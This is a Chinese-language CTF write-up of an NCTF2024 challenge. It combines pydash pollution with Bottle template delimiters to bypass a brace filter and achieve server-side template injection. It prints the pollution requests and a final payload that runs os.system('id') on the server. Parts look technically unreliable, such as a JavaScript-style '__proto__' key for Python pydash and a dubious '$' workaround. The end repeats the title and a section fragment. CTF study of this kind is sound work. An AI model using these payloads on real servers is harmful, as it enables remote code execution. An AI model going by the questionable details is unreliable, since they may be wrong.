Bottle框架渲染标识符挖掘与SSTI漏洞利用分析<\/h1>

前言<\/h2>
本文记录了对Bottle框架模板渲染标识符的挖掘过程，通过原型链污染修改模板渲染标识符，绕过过滤实现SSTI（服务器端模板注入）漏洞利用的技术细节。该技术源于NCTF2024的"ez_dash_revenge"题目，结合了pydash原型链污染和Bottle模板渲染漏洞。<\/p>

漏洞背景<\/h2>

题目环境包含两个关键路由：<\/p>

setValue<\/code>路由：存在pydash原型链污染漏洞<\/li>

render<\/code>路由：存在SSTI漏洞，但过滤了{<\/code>和}<\/code>字符<\/li>
<\/ol>
技术要点<\/h2>
1. Bottle框架模板渲染基础<\/h3>
Bottle框架支持在模板中嵌入Python代码，使用以下标识符：<\/p>

%<\/code>：单行Python代码<\/li>
<%<\/code>和%><\/code>：多行Python代码块<\/li>
<\/ul>
2. 模板渲染标识符定义位置<\/h3>
Bottle框架的模板渲染标识符定义在bottle.py<\/code>文件的StplParser<\/code>类中，关键变量包括：<\/p>

block_start<\/code><\/li>
block_close<\/code><\/li>
inline_end<\/code><\/li>
inline_start<\/code><\/li>
<\/ul>
3. 标识符污染思路<\/h3>
由于题目过滤了{}<\/code>，尝试通过原型链污染将标识符修改为[[]]<\/code>，从而绕过过滤实现SSTI。<\/p>
详细分析过程<\/h2>
1. 定位标识符定义<\/h3>
通过分析bottle.py<\/code>源代码，发现标识符定义在StplParser<\/code>类的set_syntax<\/code>方法中：<\/p>
def<\/span> set_syntax<\/span>(self, syntax):
<\/span><\/span>    """ Define syntax rules via string. """<\/span>
<\/span><\/span>    names =<\/span> syntax or<\/span> '{<\/span>% %<\/span>} % {{ }}'<\/span>
<\/span><\/span>    self.<\/span>block_start, self.<\/span>block_close, \
<\/span><\/span>    self.<\/span>inline_start, self.<\/span>inline_end =<\/span> names.<\/span>split()
<\/span><\/span><\/code><\/pre>2. 原型链污染利用<\/h3>
使用pydash的setValue<\/code>方法污染标识符：<\/p>
# 污染payload<\/span>
<\/span><\/span>{
<\/span><\/span>    "__proto__"<\/span>: {
<\/span><\/span>        "block_start"<\/span>: "[["<\/span>,
<\/span><\/span>        "block_close"<\/span>: "]]"<\/span>,
<\/span><\/span>        "inline_start"<\/span>: "[["<\/span>,
<\/span><\/span>        "inline_end"<\/span>: "]]"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 污染后的模板渲染<\/h3>
污染成功后，模板渲染标识符从{{}}<\/code>变为[[]]<\/code>，可以绕过对{}<\/code>的过滤：<\/p>
# 原始SSTI payload<\/span>
<\/span><\/span>{{7<\/span>*<\/span>7<\/span>}}
<\/span><\/span>
<\/span><\/span># 污染后使用的payload<\/span>
<\/span><\/span>[[7<\/span>*<\/span>7<\/span>]]
<\/span><\/span><\/code><\/pre>4. 调试过程中的关键发现<\/h3>
在调试过程中发现几个关键点：<\/p>


模板查找机制<\/strong>：Bottle会在.\/views\/<\/code>目录下寻找模板文件<\/p>
<\/li>

渲染流程<\/strong>：<\/p>

调用template()<\/code>函数<\/li>
进入templates()<\/code>函数<\/li>
初始化模板引擎类<\/li>
调用prepare()<\/code>函数<\/li>
最终调用render()<\/code>方法<\/li>
<\/ul>
<\/li>

关键执行点<\/strong>：exec()<\/code>函数是实际执行模板代码的关键位置<\/p>
<\/li>
<\/ol>
5. 污染注意事项<\/h3>
污染标识符时需要保持匹配关系，否则会导致KeyError<\/code>。例如：<\/p>

不能只污染block_start<\/code>而不污染block_close<\/code><\/li>
需要保持inline_start<\/code>和inline_end<\/code>的配对<\/li>
<\/ul>
完整利用流程<\/h2>


实施原型链污染<\/strong>：<\/p>
POST<\/span> \/setValue HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "__proto__"<\/span>: {
<\/span><\/span>        "block_start"<\/span>: "[["<\/span>,
<\/span><\/span>        "block_close"<\/span>: "]]"<\/span>,
<\/span><\/span>        "inline_start"<\/span>: "[["<\/span>,
<\/span><\/span>        "inline_end"<\/span>: "]]"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

触发SSTI<\/strong>：<\/p>
GET<\/span> \/render?name=[[7*7]] HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span><\/code><\/pre><\/li>

利用结果<\/strong>：

页面将返回计算结果49<\/code>，证明SSTI成功<\/p>
<\/li>
<\/ol>
绕过技巧<\/h2>
当污染所有标识符为[[]]<\/code>时，可能导致模板查找进入错误分支。解决方法是在payload中包含$<\/code>字符：<\/p>
GET \/render?name=[[$import os;os.system('id')]] HTTP\/1.1
<\/span><\/span><\/span><\/code><\/pre>防御建议<\/h2>

避免使用不安全的模板渲染函数<\/li>
对用户输入进行严格过滤<\/li>
避免将用户可控数据传入原型对象<\/li>
使用最新版本的框架和依赖库<\/li>
<\/ol>
参考资源<\/h2>

NCTF2024 "ez_dash_revenge"题目<\/li>
GHCTF2025 "Message in a Bottle"题目<\/li>
Bottle框架官方文档<\/li>
Pydash原型链污染相关研究<\/li>
<\/ol>
通过本文的分析，我们深入了解了Bottle框架模板渲染机制和如何通过原型链污染修改渲染标识符实现SSTI的技术细节。这种技术在CTF比赛中具有实际应用价值，同时也提醒开发者在实际项目中需要注意此类安全问题。<\/p>

Bottle框架渲染标识符挖掘与SSTI漏洞利用分析<\/h1>

技术要点<\/h2>

3. 标识符污染思路<\/h3> 由于题目过滤了{}<\/code>，尝试通过原型链污染将标识符修改为[[]]<\/code>，从而绕过过滤实现SSTI。<\/p>

3. 标识符污染思路<\/h3>
由于题目过滤了`{}<\/code>，尝试通过原型链污染将标识符修改为[[]]<\/code>，从而绕过过滤实现SSTI。<\/p>`